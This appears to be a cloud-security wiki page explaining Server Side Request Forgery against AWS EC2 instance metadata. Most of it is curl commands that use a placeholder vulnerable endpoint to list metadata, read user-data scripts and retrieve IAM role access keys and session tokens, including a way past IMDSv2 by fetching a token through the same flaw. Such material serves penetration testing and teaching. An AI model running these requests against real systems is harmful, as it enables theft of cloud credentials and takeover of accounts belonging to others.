# Server Side Request Forgery (SSRF) ## Overview While not unique to the cloud, Server Side Request Forgery (SSRF) is a type of web vulnerability affecting server side application code allowing an attacker to connect to internal services like internal databases or the [AWS EC2 Instance Metadata Service (IMDS)](https://www.techwithtyler.dev/cloud-security/aws/compute/ec2#imds). *** ## Accessing EC2 IMDS Metadata If we can find a vulnerable endpoint of an application running on an EC2 instance, e.g., `status.php?name=` then we can access the IMDS service and retrieve metadata from the EC2 instance. {% code overflow="wrap" %} ```bash curl http://vulnerablewebsite.fake/status/status.php?name=169.254.169.254/latest/user-data/ ami-id ami-launch-index ami-manifest-path block-device-mapping/ events/ hostname iam/ [SNIP] ``` {% endcode %} If the EC2 has an Instance Profile (IAM Role) attached, we can get the role's credentials, {% code overflow="wrap" %} ```bash curl http://vulnerablewebsite.fake/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/ ec2-application-role # note the role name will be different (if there is one) ``` {% endcode %} {% code overflow="wrap" %} ```bash curl http://vulnerablewebsite.fake/status/status.php?name=169.254.169.254/latest/meta-data/iam/security-credentials/ec2-application-role [SNIP] { "Code" : "Success", "LastUpdated" : "2024-01-03T23:24:35Z", "Type" : "AWS-HMAC", "AccessKeyId" : "ASIA[REDACTED]", "SecretAccessKey" : "wj+h[REDACTED]", "Token" : "IQoJb[REDACTED]", "Expiration" : "2024-01-04T05:38:34Z" } ``` {% endcode %} *** ### IMDSv1 and v2 AWS introduced v2 of the IMDS service as a mitigation to the vulnerability described above with IMDSv1. V2 requires first getting a token to perform enumeration of IMDS. However, it's not fool proof. As long as you can make PUT requests, you can easily obtain a token and continue the attack. {% tabs %} {% tab title="IMDSv1" %} {% code overflow="wrap" %} ```bash curl http://vulnerablewebsite.fake/status/status.php?name=169.254.169.254/latest/ meta-data/ dynamic user-data/ ``` {% endcode %} {% endtab %} {% tab title="IMDSv2" %} {% code overflow="wrap" %} ```bash TOKEN=`curl -X PUT "http://vulnerablewebsite.fake/status/status.php?name=http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"` ``` {% endcode %} {% code overflow="wrap" %} ```bash curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://vulnerablewebsite.fake/status/status.php?name=http://169.254.169.254/latest" meta-data/ dynamic user-data/ ``` {% endcode %} {% endtab %} {% endtabs %} *** ### Metadata Service Info #### Endpoints {% tabs %} {% tab title="IPv4" %} {% code overflow="wrap" %} ```bash http://169.254.169.254/latest/ ``` {% endcode %} {% endtab %} {% tab title="IPv6" %} {% code overflow="wrap" %} ```bash http://[fd00:ec2::254]/latest/ ``` {% endcode %} {% endtab %} {% endtabs %} {% tabs %} {% tab title="Metadata" %} This endpoint provides info like the instance's region, security groups, IAM role credentials, and more. All categories of information can be viewed in the [AWS docs](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories). {% code overflow="wrap" %} ```bash http://169.254.169.254/latest/meta-data/ http://[fd00:ec2::254]/latest/meta-data/ ami-id ami-launch-index ami-manifest-path [SNIP] ``` {% endcode %} {% endtab %} {% tab title="User Data" %} This endpoint provides access to the User Data script that may or may not have been used when launching the EC2. This could contain sensitive information like API keys, credentials, and resource names. {% code overflow="wrap" %} ```bash http://169.254.169.254/latest/user-data http://[fd00:ec2::254]/latest/user-data #!/bin/bash yum update -y service httpd start chkconfig httpd on ``` {% endcode %} {% endtab %} {% tab title="Dynamic Data" %} This provides a cryptographically signed document that describes the instance and its attributes. {% code overflow="wrap" %} ```bash http://169.254.169.254/latest/dynamic/instance-identity/ http://[fd00:ec2::254]/latest/dynamic/instance-identity/ rsa2048 pkcs7 document signature dsa2048 ``` {% endcode %} {% endtab %} {% endtabs %}